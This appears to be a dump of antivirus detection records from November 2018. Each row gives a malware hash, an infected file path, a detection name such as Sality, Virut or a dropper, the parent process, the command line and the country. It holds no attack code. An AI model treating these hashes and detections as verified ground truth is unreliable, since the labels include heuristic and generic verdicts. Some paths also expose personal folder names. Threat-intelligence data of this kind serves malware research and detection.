  Row(detection=Row(filename='8abb9d1535b61747bbf37018e21ec4f1ec564914211266e82c648c352e934bf5', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\8ABB9D1535B61747BBF37018E21EC4F1EC564914211266E82C648C352E934BF5', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='8abb9d1535b61747bbf37018e21ec4f1ec564914211266e82c648c352e934bf5', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:01:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='scmini.exe', filepath='c:\\program files (x86)\\smartcloudinput\\1.3.6.10910\\scmini.exe', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='9ea296ef2d26b518fc5a206d110163bf53cdb924e081a145c6c057aa546834ac', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-02T09:01:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='dc86dd6c1b8d4af8cb1d2d250a3c78d9d21d5314f73bd753e4778c47942c098f', metadata=Row(cmdline='\\\\\\/Embedding', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-02T00:31:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\vgqbo2eivww\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:35:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='replug.exe', filepath='C:\\Program Files\\Join Air\\Replug.exe', filesize=128000, name='W32/Infector.Gen.#M300.#R7863'), hash='e145d612be86b67d1250e7495645a9df6a5dbbf23d702b9b347ca60486a2cf2c', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T03:08:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmpg3sqgnsy', filepath='/tmp/tmpg3sqgnsy', filesize=584000, name='TR/Dropper.VB.b60a2d.#M1.#R1'), hash='b60a2df189b459696768ff978799e748c5b043d1a97652589239b42c76cc2af6', metadata=Row(cmdline=None, country='IE', os_name='Linux', os_vmajor='8', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T21:47:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='logo.exe', filepath='F:\\logo\\logo.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='libraries.pif', filepath='C:\\Users\\X\\Libraries\\Libraries.pif', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='8d08f3a333a6cf026bb243fada0682650b148d58949dc6a48714268893873c03', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:16:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cw1371a0.exe', filepath='d:\\برامج\\dell\\dall win 32\\CW1371A0.exe', filesize=4340000, name='W32/Neshta.A.#M1.#R1'), hash='dd4ffd33bef46a0b0aabb8ecf34fefa6b87a9023f60a8c31d998aa89f4ea8e25', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:46:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='cap3onn.exe', filepath='D:\\c\\LBP1120_WinXP\\CAP3ONN.EXE', filesize=128000, name='W32/Sality.AG.#M1.#R1'), hash='c66e4b6ec4ea9463378f9a53b333df3a8bd3cd832c64ceb25263a6032586baf1', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe5_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T10:49:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-205420-be60b5be', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-205420-BE60B5BE', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:54:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023a4df', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023a4df', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:57:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00239314', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00239314', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:38:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023811c', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023811c', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:18:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-090506-bb414ada', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_96100e26\\AVSCAN-20181104-085333-5EAEECD5\\AVSCAN-20181104-090506-BB414ADA', filesize=896000, name='PUA/AD.IStartSurf.Y.#M1.#R1'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:04:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='quyet dinh gs.exe', filepath='F:\\bi thư\\GS Mạnh\\Quyet dinh GS.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='b0016b84d51f5139cbfc80f308cd1a1959903a346e07de97ef71810dfc809077', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:44:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a6a635a93c9e2c84b1066a3527b6c9f9.smp', filepath='\\\\192.168.10.10\\SHARED\\_tools\\runtime\\scan\\tmp_675556641\\a6a635a93c9e2c84b1066a3527b6c9f9.smp', filesize=192000, name='HEUR/AGEN.1004975.#M1.#R1'), hash='ce927702017386e17527a625696e990c7193fc7f7cf4e61fcd15d9282ca835db', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\tools\\http_server\\http_server.exe', parentsize=6242816, timestamp='2018-11-04T16:39:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00238ff1', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00238ff1', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:34:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-135956-9c2dcb13', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_68715a38\\AVSCAN-20181104-132010-5D814B12\\AVSCAN-20181104-135956-9C2DCB13', filesize=704000, name='HEUR/AGEN.1032303.#M1.#R1'), hash='ad4b8d07fc313462591aa91bede2f414c2be3e9c45341cfd5d31343a6ce5d375', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:00:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='fa97aba00f1b5fe70ec5c62dc1c08d559e20d0b64045f375fda312e85c4491d5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T05:01:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202440-4d6fdaa8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_bc7243c7\\AVSCAN-20181104-202424-4B134569\\AVSCAN-20181104-202440-4D6FDAA8', filesize=1536000, name='TR/Dropper.Gen.#M1.#R1'), hash='fa27dc0aa4ce63e95f65ec478f4dc33437b2b25e63e12968539ad6ae053765ad', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T18:24:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:53:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:50:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181101-193505-c2a17318', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7bc871c5\\AVSCAN-20181101-193316-AF127610\\AVSCAN-20181101-193505-C2A17318', filesize=192000, name='TR/Black.Gen2.#M1.#R1'), hash='fff0bae1269aaf7bf1db339362c218ba9a2a9512b06a583eb281fd59858bead7', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:35:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\AutoCAD2009\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.A.#M1.#R1'), hash='f63062e6ae4503f8bc696fd0b759d0763f5f032bf5335dbd265c92907a0459a4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:28:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='emailloginnow.exe', filepath='C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\MOZ0BVF5\\EmailLoginNow.exe', filesize=652000, name='HEUR/AGEN.1020989.#M1.#R1'), hash='f9e17909eb9d92c55b55701c4b696472bd113945a88c191de6c694638193050d', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:UVbEq6FHW0+5zmhW.1', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T16:50:07Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-02T13:15:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='system volume information.pif', filepath='f:\\system volume information\\System Volume Information.pif', filesize=5952000, name='HEUR/AGEN.1015658.#M1.#R1'), hash='6f59c94a106529163adc6375303d689d70c6c0b312d0d536cd85811fcdf1dd14', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T09:16:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-172529-bf5be6f0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a9d890e6\\AVSCAN-20181102-172520-BDB58A42\\AVSCAN-20181102-172529-BF5BE6F0', filesize=256000, name='TR/Agent.256000.C.#M1.#R1'), hash='185c137566c02057db28f1eef903b17754be7f63a38d74984dae684e62bf79c0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:25:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='webapprt-stub.exe', filepath='\\\\nas-2tb\\共用資料夾\\1.暫存業務區\\5.黃佳音\\舊資料\\9.吳伊環\\巫data\\資訊軟體\\mozilla firefox\\webapprt-stub.exe', filesize=128000, name='W32/Stanit.#M1.#R1'), hash='4df0896f082c54030716c989fde1487adfc36b6c72baafa1c766c4fc2ee0773b', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:C1hRPhq5PE2zUF3r.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=114408, timestamp='2018-11-02T05:25:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:51:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:21:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='langpack.exe.pptx', filepath='E:\\AutoCAD 2006\\Auto CAD 2006\\Bin\\acadFeui\\support\\dotnetfx\\ita\\langpack.exe.PPTX', filesize=1496000, name='W32/Xorer.DR.#M1.#R1'), hash='0e6997e7a00eaeb5b54f885d76feaf4eceb195d5a0434d5855cc79f8c977b3f9', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Spyware Terminator\\SpywareTerminator.exe', parentsize=7014656, timestamp='2018-11-02T03:03:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-02-10-10-59.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-28T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T10:16:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T10:45:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2a7fc39d96c8b7aa8be1efd74c3ffb5e015e968c271ca4e66b59ed939f1ec5b2', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\2A7FC39D96C8B7AA8BE1EFD74C3FFB5E015E968C271CA4E66B59ED939F1EC5B2', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='2a7fc39d96c8b7aa8be1efd74c3ffb5e015e968c271ca4e66b59ed939f1ec5b2', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:19:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=2880000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='5ea3e563ac2015ce635c1637b0c9cd4ca21363112984bde6ab8038b8c16b2fda', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T17:18:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:29:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160026-f00d74d4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-160026-F00D74D4', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:00:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0001071f', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2124\\tmp000016d6\\tmp0001071f', filesize=12288000, name='HEUR/AGEN.1011420.#M1.#R1'), hash='232827a10e7717a61e6aeeeaa301081da048a2d57bc73450d4667ddb9752ff16', metadata=Row(cmdline='\\\\\\/service', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\EPSecurityService.exe', parentsize=94952, timestamp='2018-11-02T01:34:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-110255-905724f3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_88516b90\\AVSCAN-20181102-110235-8DD06B5C\\AVSCAN-20181102-110255-905724F3', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='43877a9f5547e0026d047c4a9e046cba684c1fc74edbe3907a6e0292aca1ce6d', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T10:02:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='release.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\TRENER\\gtaquickkeyipe\\RELEASE\\RELEASE.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='36a2db40c4bf2921d7b552f795ca68a29a24ab8044cc43218954a78787a52d2a', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-123002-03e8e5f1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a407a093\\AVSCAN-20181102-122936-FEFF88B6\\AVSCAN-20181102-123002-03E8E5F1', filesize=4096000, name='TR/SPY.24653.#M1.#R1'), hash='6cf8cd73985f35e6e4e9b09c75225f3ebcd77518fd7b1e749ffb31e6204455d2', metadata=Row(cmdline=None, country='BG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:29:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-091301-837e86ba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_357366dc\\AVSCAN-20181102-091243-80DD926A\\AVSCAN-20181102-091301-837E86BA', filesize=576000, name='TR/Miner.syyzh.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:13:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='stage6_se.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\SOUND\\SE\\STAGE6_SE\\STAGE6_SE.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='42f92f3f29aae13707db0e33d4fd303f4f13cb38021814171e199ab85cf5e694', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:28:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:42:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-201203-957c66b8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ce4c9676\\AVSCAN-20181102-201145-9317B77C\\AVSCAN-20181102-201203-957C66B8', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:12:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:25:21Z'), dt=datetime.date(2018, 11, 2)),
